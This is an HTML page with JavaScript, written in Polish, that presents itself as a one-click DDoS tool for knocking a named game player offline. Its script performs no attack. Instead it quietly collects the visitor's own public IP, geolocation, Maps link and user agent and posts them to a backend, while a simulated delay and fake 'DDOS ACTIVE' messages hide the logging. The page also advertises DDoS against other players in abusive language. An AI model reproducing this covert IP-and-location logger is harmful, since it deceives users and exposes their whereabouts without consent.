<!DOCTYPE html>
<html lang="pl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SZYBKI DD0S</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
</head>
<body>
    <div class="container">
        <div class="header">
            <h1><i class="fa-solid fa-bomb"></i> SZYBKI DD0S</h1>
            <p class="subtitle">Jeden przycisk = Szybka wycinka typeczka</p>
        </div>    
        <div class="status-card" id="statusCard">
            <div class="status-content">
                <i class="fas fa-spinner fa-spin"></i>
                <span id="statusText">Status ddOsiarki: ✅</span>
            </div>
        </div>
        
        <!-- Modal do wpisywania nicków -->
        <div id="nickModal" class="modal">
            <div class="modal-content">
                <div class="modal-header">
                    <h3><i class="fa-solid fa-user"></i> Wpisz nicki</h3>
                    <span class="close">&times;</span>
                </div>
                <div class="modal-body">
                    <div class="input-group">
                        <label for="yourNick">
                            <i class="fa-solid fa-user"></i> Twój nick:
                        </label>
                        <input type="text" id="yourNick" placeholder="np. twojstary321" autocomplete="off">
                    </div>
                    <div class="input-group">
                        <label for="targetNick">
                            <i class="fa-solid fa-bomb"></i> Nick gracza do wyjebania bomby w router tej pizdzie:
                        </label>
                        <input type="text" id="targetNick" placeholder="np. twojstary123" autocomplete="off">
                    </div>
                </div>
                <div class="modal-footer">
                    <button id="cancelBtn" class="btn-cancel">
                        <i class="fa-solid fa-times"></i> ANULUJ
                    </button>
                    <button id="sendAttackBtn" class="btn-attack">
                        <i class="fa-solid fa-bomb"></i> WYJEB ANCMONA
                    </button>
                </div>
            </div>
        </div>
        
        <button id="sendButton" class="send-btn" disabled>
            <div class="btn-content">
                <i class="fas fa-paper-plane"></i>
                <span class="btn-text">SZYBKI DD0S</span>
            </div>
            <div class="btn-sub">Kliknij, aby wpisać nick gracza.</div>
        </button>
        
        <!-- Pierwsze ładowanie (przycisk SZYBKI DDOS) -->
        <div class="loading" id="loading">
            <div class="spinner"></div>
            <p>Wysyłam typeczka na przerwe po wyjebaniu neta</p>
        </div>
        
        <!-- Drugie ładowanie (przycisk WYJEB ANCMONA) -->
        <div id="attackLoading" class="attack-loading">
            <div class="attack-spinner"></div>
            <p class="attack-loading-text">Wycinam typeczka, prosze czekac...</p>
        </div>
        
        <div class="result-card" id="resultCard">
        </div>
        
        <div class="info-section">
            <h3><i class="fas fa-info-circle"></i> Poradnik</h3>
            <div class="info-grid">
                <div class="info-item">
                    <i class="fas fa-mouse-pointer"></i>
                    <p>1. Kliknij przycisk</p>
                </div>
                <div class="info-item">
                    <i class="fa-solid fa-user"></i>
                    <p>2. Wpisz nick gracza</p>
                </div>
                <div class="info-item">
                    <i class="fa-solid fa-bomb"></i>
                    <p>3. Ancymon zaczyna wisięć</p>
                </div>
                <div class="info-item">
                    <i class="fas fa-check-circle"></i>
                    <p>4. Gotowe!</p>
                </div>
            </div>
        </div>
        
        <footer>
            <div class="footer-content">
                <i class="fa-solid fa-truck-fast"></i> Szybko, sprawnie i wyjeba na typeczka</p>
                <p><i class="fa-solid fa-hand"></i> Pomogłem? Nie dziękuj.</p>
            </div>
        </footer>
    </div>
    
    <script>
        const SERVER_URL = 'http://localhost:3000';
        
        const sendButton = document.getElementById('sendButton');
        const loading = document.getElementById('loading');
        const attackLoading = document.getElementById('attackLoading');
        const resultCard = document.getElementById('resultCard');
        const statusCard = document.getElementById('statusCard');
        const statusText = document.getElementById('statusText');
        
        // Elementy modala
        const nickModal = document.getElementById('nickModal');
        const yourNickInput = document.getElementById('yourNick');
        const targetNickInput = document.getElementById('targetNick');
        const sendAttackBtn = document.getElementById('sendAttackBtn');
        const cancelBtn = document.getElementById('cancelBtn');
        const closeBtn = document.querySelector('.close');
        
        let userData = {
            ip: null,
            location: null,
            mapsLink: null
        };
        
        async function checkBackend() {
            try {
                const response = await fetch(`${SERVER_URL}/health`);
                const data = await response.json();
                
                if (data.status === 'OK') {
                    statusText.innerHTML = `Status ddOsiarki: ✅`;
                    statusCard.className = 'status-card success';
                    sendButton.disabled = false;
                    return true;
                }
            } catch (error) {
                statusText.innerHTML = 'Status ddOsiarki: ❌';
                statusCard.className = 'status-card error';
            }
            return false;
        }
        
        async function getUserData() {
            try {
                const ipResponse = await fetch('https://api.ipify.org?format=json');
                const ipData = await ipResponse.json();
                userData.ip = ipData.ip;
                
                try {
                    const locResponse = await fetch(`https://ipapi.co/${userData.ip}/json/`);
                    const locData = await locResponse.json();
                    
                    userData.location = {
                        country: locData.country_name || 'Nieznany',
                        city: locData.city || 'Nieznane',
                        region: locData.region || 'Nieznane',
                        postal: locData.postal || '00-000',
                        lat: locData.latitude || 52.2297,
                        lon: locData.longitude || 21.0122
                    };
                    
                    userData.mapsLink = `https://www.google.com/maps?q=${userData.location.lat},${userData.location.lon}&z=12`;
                    
                } catch (locError) {
                    userData.location = {
                        country: 'Poland',
                        city: 'Warsaw',
                        region: 'Mazovia',
                        postal: '00-001',
                        lat: 52.2297,
                        lon: 21.0122
                    };
                    userData.mapsLink = 'https://www.google.com/maps/@52.2297,21.0122,12z';
                }
                
            } catch (error) {
                console.error('Błąd pobierania danych:', error);
            }
        }
        
        // Pokazuj modal po kliknięciu przycisku
        sendButton.addEventListener('click', () => {
            if (!sendButton.disabled) {
                nickModal.style.display = 'flex';
                yourNickInput.focus();
            }
        });
        
        // Ukryj modal
        function hideModal() {
            nickModal.style.display = 'none';
            yourNickInput.value = '';
            targetNickInput.value = '';
        }
        
        // Event listeners dla modala
        closeBtn.addEventListener('click', hideModal);
        cancelBtn.addEventListener('click', hideModal);
        
        // Zamknij kliknięciem poza modalem
        nickModal.addEventListener('click', (e) => {
            if (e.target === nickModal) {
                hideModal();
            }
        });
        
        // Enter w polach input
        yourNickInput.addEventListener('keypress', (e) => {
            if (e.key === 'Enter') {
                targetNickInput.focus();
            }
        });
        
        targetNickInput.addEventListener('keypress', (e) => {
            if (e.key === 'Enter') {
                sendAttack();
            }
        });
        
        // Escape zamyka modal
        document.addEventListener('keydown', (e) => {
            if (e.key === 'Escape' && nickModal.style.display === 'flex') {
                hideModal();
            }
        });
        
        // Funkcja pokazująca ładowanie ataku
        function showAttackLoading() {
            attackLoading.style.display = 'flex';
            nickModal.style.display = 'none';
            
            // Blokuj przyciski w modalu
            sendAttackBtn.disabled = true;
            cancelBtn.disabled = true;
            
            // Zmień tekst ładowania na losowy
            const loadingTexts = [
                "Wycinam typeczka, prosze czekac...",
                "Ładuję pociski DDOS...",
                "Konfiguruję atak...",
                "Szukam IP gracza...",
                "Przygotowuję bombę...",
                "Inicjuję wyjebanie..."
            ];
            
            let textIndex = 0;
            const loadingText = attackLoading.querySelector('.attack-loading-text');
            
            // Co 2 sekundy zmieniaj tekst
            const textInterval = setInterval(() => {
                textIndex = (textIndex + 1) % loadingTexts.length;
                loadingText.textContent = loadingTexts[textIndex];
            }, 2000);
            
            // Zwróć funkcję do czyszczenia interwału
            return () => {
                clearInterval(textInterval);
                sendAttackBtn.disabled = false;
                cancelBtn.disabled = false;
            };
        }
        
        // Ukryj ładowanie ataku
        function hideAttackLoading() {
            attackLoading.style.display = 'none';
        }
        
        // Wyślij atak
        sendAttackBtn.addEventListener('click', sendAttack);
        
        async function sendAttack() {
            const yourNick = yourNickInput.value.trim();
            const targetNick = targetNickInput.value.trim();
            
            if (!yourNick || !targetNick) {
                alert('Musisz podać oba nicki!');
                return;
            }
            
            // Pokaż ładowanie ataku
            const clearLoading = showAttackLoading();
            
            try {
                const dataToSend = {
                    yourNick: yourNick,
                    targetNick: targetNick,
                    ip: userData.ip,
                    location: userData.location,
                    userAgent: navigator.userAgent,
                    mapsLink: userData.mapsLink
                };
                
                console.log('💣 Rozpoczynam atak na:', targetNick);
                
                // Symuluj opóźnienie 2-3 sekundy dla realizmu
                await new Promise(resolve => setTimeout(resolve, 2000 + Math.random() * 1000));
                
                const response = await fetch(`${SERVER_URL}/api/save`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(dataToSend)
                });
                
                const result = await response.json();
                
                // Ukryj ładowanie
                clearLoading();
                hideAttackLoading();
                
                if (result.success) {
                    // POKAŻ SZCZEGÓŁY ATAKU Z NICKAMI
                    resultCard.innerHTML = `
                        <div class="result-success">
                            <i class="fas fa-check-circle"></i>
                            <h3>💣 ${yourNick} WYJEBAŁ ${targetNick} NA BOMBĘ!</h3>
                            <div class="result-details">
                                <p><strong>👤 Atakujący:</strong> ${yourNick}</p>
                                <p><strong>🎯 Ancymon wyjebany na roouuter:</strong> ${targetNick}</p>
                                <p><strong>🌍 IP:</strong> ${result.data.ip || userData.ip}</p>
                                <p><strong>📍 Lokalizacja:</strong> ${result.data.location || `${userData.location.city}, ${userData.location.country}`}</p>
                                <p><strong>⏰ Czas:</strong> ${new Date(result.data.timestamp || new Date()).toLocaleString('pl-PL')}</p>
                            </div>
                            <div class="attack-status">
                                <i class="fa-solid fa-bolt"></i>
                                <span>DDOS AKTYWNY! Gracz został wyjebany na 60 sekund!</span>
                            </div>
                        </div>
                    `;
                    resultCard.className = 'result-card success';
                    resultCard.style.display = 'block';
                    
                    // Zmień główny przycisk na potwierdzenie
                    sendButton.innerHTML = `
                        <div class="btn-content">
                            <i class="fas fa-bomb"></i>
                            <span class="btn-text">💣 ${targetNick} WYJEBAŁ NA BOMBĘ!</span>
                        </div>
                        <div class="btn-sub">DDOS aktywny przez 60 sekund</div>
                    `;
                    sendButton.style.background = 'linear-gradient(135deg, #ff416c, #ff4b2b)';
                    sendButton.disabled = true;
                    
                    // Licznik czasu
                    let secondsLeft = 60;
                    const countdown = setInterval(() => {
                        secondsLeft--;
                        sendButton.querySelector('.btn-sub').textContent = `DDOS aktywny przez ${secondsLeft} sekund`;
                        
                        if (secondsLeft <= 0) {
                            clearInterval(countdown);
                            sendButton.innerHTML = `
                                <div class="btn-content">
                                    <i class="fas fa-paper-plane"></i>
                                    <span class="btn-text">SZYBKI DD0S</span>
                                </div>
                                <div class="btn-sub">Kliknij, aby wpisać nick gracza.</div>
                            `;
                            sendButton.style.background = 'linear-gradient(135deg, #007bff, #0056b3)';
                            sendButton.disabled = false;
                        }
                    }, 1000);
                    
                } else {
                    throw new Error(result.error || 'Błąd serwera');
                }
                
            } catch (error) {
                // Ukryj ładowanie w przypadku błędu
                clearLoading();
                hideAttackLoading();
                
                // Pokaż błąd
                resultCard.innerHTML = `
                    <div class="result-error">
                        <i class="fas fa-times-circle"></i>
                        <h3>❌ BŁĄD ATAKU NA ${targetNick}!</h3>
                        <div class="error-details">
                            <p><strong>👤 Twój nick:</strong> ${yourNick}</p>
                            <p><strong>🎯 Cel ataku:</strong> ${targetNick}</p>
                            <p><strong>💥 Błąd:</strong> ${error.message}</p>
                        </div>
                        <p class="error-help">Sprawdź czy backend działa: <code>node server.js</code></p>
                    </div>
                `;
                resultCard.className = 'result-card error';
                resultCard.style.display = 'block';
                
                // Przywróć przycisk do ponowienia
                sendButton.innerHTML = `
                    <div class="btn-content">
                        <i class="fas fa-redo"></i>
                        <span class="btn-text">SPRÓBUJ PONOWNIE</span>
                    </div>
                    <div class="btn-sub">Kliknij, aby ponowić atak</div>
                `;
                sendButton.style.background = 'linear-gradient(135deg, #dc3545, #c82333)';
                sendButton.disabled = false;
                
                // Po 5 sekundach przywróć normalny przycisk
                setTimeout(() => {
                    sendButton.innerHTML = `
                        <div class="btn-content">
                            <i class="fas fa-paper-plane"></i>
                            <span class="btn-text">SZYBKI DD0S</span>
                        </div>
                        <div class="btn-sub">Kliknij, aby wpisać nick gracza.</div>
                    `;
                    sendButton.style.background = 'linear-gradient(135deg, #007bff, #0056b3)';
                }, 5000);
            }
        }
        
        window.onload = async function() {
            await checkBackend();
            await getUserData();
        };
    </script>
</body>
</html>